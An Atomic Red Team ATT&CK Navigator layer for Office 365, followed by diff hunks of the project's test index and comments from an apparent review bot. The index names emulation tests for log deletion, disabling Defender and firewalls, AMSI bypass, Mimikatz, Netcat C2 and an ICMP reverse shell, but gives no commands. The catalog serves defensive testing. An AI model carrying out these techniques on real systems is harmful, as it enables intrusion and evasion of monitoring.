{"name":"Atomic Red Team (Office-365)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log 
Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
@@ -21,6 +21,8 @@ discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumer
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1201,Password Policy Discovery,12,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
discovery,T1526,Cloud Service Discovery,2,AWS - Enumerate common cloud services,aa8b9bcc-46fa-4a59-9237-73c7b93a980c,powershell
discovery,T1526,Cloud Service Discovery,3,Azure - Enumerate common cloud services,58f57c8f-db14-4e62-a4d3-5aaf556755d7,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
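Review bot: the two T1098 rows in this hunk's context (AWS - Create Access Key and Secret Key with GUID 8822c3b0-d9f9-4daf-a043-491160a31122, and AWS - Create a group and add a user to that group with GUID 8822c3b0-d9f9-4daf-a043-49f110a31122) differ by a single hex digit, which looks like a hand-edited copy rather than an independently generated GUID. This predates the change, but since this index is generated from the atomic YAML, it is worth confirming that both source tests carry distinct, freshly generated GUIDs before anything keys on them. The new T1526 rows (tests 2 and 3) are consistent with the existing test 1: same technique name, sequential test numbers, powershell executor.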
@@ -44,3 +46,5 @@ collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Acces
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
execution,T1651,Cloud Administration Command,1,AWS Run Command (and Control),a3cc9c95-c160-4b86-af6f-84fba87bfd30,powershell
execution,T1648,Serverless Execution,1,Lambda Function Hijack,87a4a141-c2bb-49d1-a604-8679082d8b91,powershell
@@ -89,8 +89,11 @@ defense-evasion,T1562.009,Impair Defenses: Safe Boot Mode,1,Safe Mode Boot,2a783
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",2,rm -rf,bd8ccc45-d632-481e-b7cf-c467627d68f9,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",3,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
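Review bot: the "Detect Virtualization Environment (MacOS)" row and the "Detect Virtualization Environment via ioreg" row in this hunk both carry test number 4 and the same GUID a960185f-aef6-4547-8350-d1ce16680d09. If the MacOS row is the removed side of a rename this is fine, but if both rows survive the index will hold two entries under one identifier and one number, which breaks lookups that key on the GUID; please confirm only the ioreg row remains.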
@@ -128,6 +131,7 @@ defense-evasion,T1222.001,File and Directory Permissions Modification: Windows F
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,6,SubInAcl Execution,a8568b10-9ab9-4140-a523-1c72e0176924,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
@@ -154,6 +158,7 @@ defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Cl
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Clear PowerShell Session History,22c779cd-9445-4d3e-a136-f75adbf0315f,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
@@ -231,6 +236,9 @@ defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impai
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,8,Modify Event Log Channel Access Permissions via Registry - PowerShell,8e81d090-0cd6-4d46-863c-eec11311298f,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,9,Modify Event Log Channel Access Permissions via Registry 2 - PowerShell,85e6eff8-3ed4-4e03-ae50-aa6a404898a5,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,10,Modify Event Log Access Permissions via Registry - PowerShell,a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1,powershell
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
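Review bot: the new test 9 name "Modify Event Log Channel Access Permissions via Registry 2 - PowerShell" differs from test 8 only by the trailing "2", so the index gives no hint of what the second variant does differently. Suggest a descriptive suffix that names the distinguishing registry path or channel instead of a sequence number.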
@@ -256,6 +264,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,24,Set a firewall rule using New-NetFirewallRule,94be7646-25f6-467e-af23-585fb13000c8,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,25,ESXi - Set Firewall to PASS Traffic,a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d,command_prompt
defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,1,Delete all auditd rules using auditctl,33a29ab1-cabb-407f-9448-269041bf2856,sh
defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,2,Disable auditd using auditctl,7906f0a6-b527-46ee-9026-6e81a9184e08,sh
@@ -392,6 +401,10 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,Disable .NET Eve
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,8,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,9,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,10,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd,fdac1f79-b833-4bab-b4a1-11b1ed676a4b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,11,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell,b42c1f8c-399b-47ae-8fd8-763181395fee,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,12,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd,110b4281-43fe-405f-a184-5d8eaf228ebf,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,13,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell,4d61779d-be7f-425c-b560-0cafb2522911,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1070,Indicator Removal on Host,2,Indicator Manipulation using FSUtil,96e86706-6afd-45b6-95d6-108d23eaf2e9,powershell
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -514,6 +527,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Dis
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,51,Delete Microsoft Defender ASR Rules - InTune,eea0a6c2-84e9-4e8c-a242-ac585d28d0d1,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,52,Delete Microsoft Defender ASR Rules - GPO,0e7b8a4b-2ca5-4743-a9f9-96051abb6e50,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,53,AMSI Bypass - Create AMSIEnable Reg Key,728eca7b-0444-4f6f-ac36-437e3d751dc0,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable EventLog-Application Auto Logger Session Via Registry - Cmd,653c6e17-14a2-4849-851d-f1c0cc8ea9ab,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -752,7 +769,6 @@ privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modif
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,2,Launch Daemon - Users Directory,6f899f9d-8a8e-4143-89a5-26fc2c3ec438,bash
privilege-escalation,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
privilege-escalation,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -838,6 +854,7 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
privilege-escalation,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
privilege-escalation,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
privilege-escalation,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
@@ -988,6 +1005,7 @@ execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
execution,T1059.010,Command and Scripting Interpreter: AutoHotKey & AutoIT,1,AutoHotKey script execution,7b5d350e-f758-43cc-a761-8e3f6b052a03,powershell
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
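Review bot: the new T1059.010 row introduces the sub-technique "Command and Scripting Interpreter: AutoHotKey & AutoIT", yet the existing row "execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution" two lines below stays under the parent T1059. Consider moving that AutoIt test under T1059.010 (or documenting why it stays on the parent) so the two scripting-engine tests are not split across techniques.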
@@ -1054,9 +1072,11 @@ execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,S
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,5,Command Prompt read contents from CMD file and execute,df81db1b-066c-4802-9bc8-b6d030c3ba8e,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,6,Command prompt writing script to file then executes it,00682c9f-7df4-4df8-950b-6dcaaa3ad9af,command_prompt
execution,T1651,Cloud Administration Command,1,AWS Run Command (and Control),a3cc9c95-c160-4b86-af6f-84fba87bfd30,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1648,Serverless Execution,1,Lambda Function Hijack,87a4a141-c2bb-49d1-a604-8679082d8b91,powershell
execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,System Services: Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
@@ -1137,7 +1157,6 @@ persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1543.004,Create or Modify System Process: Launch Daemon,2,Launch Daemon - Users Directory,6f899f9d-8a8e-4143-89a5-26fc2c3ec438,bash
persistence,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
persistence,T1505.003,Server Software Component: Web Shell,1,Web Shell Written to Disk,0a2ce662-1efa-496f-a472-2fe7b080db16,command_prompt
persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -1211,6 +1230,7 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
@@ -1335,10 +1355,13 @@ command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b
command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1572,Protocol Tunneling,4,run ngrok,4cdc9fc7-53fb-4894-9f0c-64836943ea60,powershell
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
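Review bot: the two new T1572 tunnel rows are both labelled "(Linux/macOS)" but use different executors, `bash` for "Microsoft Dev tunnels" and `sh` for "VSCode tunnels". Unless one of them actually relies on bash-only syntax, align them on one executor so the two tests run under the same interpreter on both platforms.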
@@ -1349,6 +1372,7 @@ command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1095,Non-Application Layer Protocol,4,Linux ICMP Reverse Shell using icmp-cnc,8e139e1f-1f3a-4be7-901d-afae9738c064,manual
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
@@ -1445,6 +1469,7 @@ collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Acc
collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
collection,T1005,Data from Local System,1,Search files of interest and save them to a single zip file (Windows),d3d9af44-b8ad-4375-8b0a-4bff4b7e419c,powershell
collection,T1005,Data from Local System,2,Find and dump sqlite databases (Linux),00cbb875-7ae4-4cf1-b638-e543fd825300,bash
collection,T1005,Data from Local System,3,Copy Apple Notes database files using AppleScript,cfb6d400-a269-4c06-a347-6d88d584d5f7,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
@@ -1462,6 +1487,7 @@ collection,T1114.002,Email Collection: Remote Email Collection,1,Office365 - Rem
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
